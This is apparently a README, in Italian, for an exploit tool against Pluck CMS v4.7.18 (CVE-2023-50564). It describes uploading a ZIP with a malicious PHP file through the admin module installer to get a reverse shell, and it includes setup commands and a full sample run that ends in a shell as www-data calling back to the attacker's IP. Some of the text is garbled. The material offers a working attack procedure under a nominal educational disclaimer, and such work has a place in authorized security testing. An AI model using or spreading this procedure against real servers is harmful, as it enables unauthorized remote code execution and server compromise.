
Questo script sfrutta la funzionalità di upload dei file in Pluck CMS v4.7.18 per caricare un file PHP malevolo, consentendo l'accesso remoto tramite una reverse shell. Una volta caricata, questa backdoor garantisce all'attaccante l'accesso al server con i permessi del server web, consentendo ulteriori azioni all'interno del sistema o della rete.
Questo script sfrutta una vulnerabilità autenticata di caricamento arbitrario di file in Pluck CMS v4.7.18 (CVE-2023-50564). Sfruttando questa vulnerabilità, un attaccante autenticato può caricare un file PHP malevolo, consentendo l'esecuzione di codice arbitrario (in questo caso, una reverse shell).
La vulnerabilità risiede nell'endpoint /admin.php?action=installmodule, che consente a un utente autenticato di caricare un file ZIP contenente file arbitrari. Caricando un file PHP malevolo, questo exploit stabilisce una reverse shell verso l'attaccante.
pip install requestspip install requests-toolbeltQuesto script richiede inoltre un login valido per l'istanza di Pluck CMS, inclusi l'URL e la password del target.
su, sudo -l) e consente all'utente di inserire manualmente l'input.git clone https://github.com/yourusername/Pluck-CMS-Exploit.git
cd Pluck-CMS-Exploit
pip install requests requests-toolbelt
Esegui l'exploit usando Python:
python3 exploit.py
Esempio:
$ python3 exploit.py
Enter the target URL (e.g., example.com): pluckcms.vulnerable.com
Enter the password for target authentication: password123
Enter your IP (for reverse shell): 10.10.14.5
Enter the port to listen on (for reverse shell): 4444
[*] Authenticating to the target...
[+] Authentication successful.
[*] Generating reverse shell PHP file...
[+] Reverse shell PHP file created successfully as 'shell.php'.
[*] Creating ZIP payload...
[+] ZIP file created as 'payload.zip'.
[*] Starting reverse shell listener on 10.10.14.5:4444 ...
[*] Uploading payload to the target...
[+] Payload uploaded successfully.
[*] Triggering reverse shell at: http://pluckcms.vulnerable.com/data/modules/payload/shell.php
[+] Connection received from ('10.10.10.1', 55678)
Shell> whoami
www-data
Questo script è pensato per scopi educativi e hacking etico. Dovrebbe essere utilizzato solo in ambienti in cui si ha il permesso esplicito di testare. L'autore non è responsabile per qualsiasi uso improprio di questo strumento.
Questo progetto è concesso in licenza sotto la MIT License - consulta MIT License per i dettagli.
Sentiti libero di eseguire il fork del repository e inviare pull request. Per qualsiasi problema o richiesta di funzionalità, apri una issue su GitHub.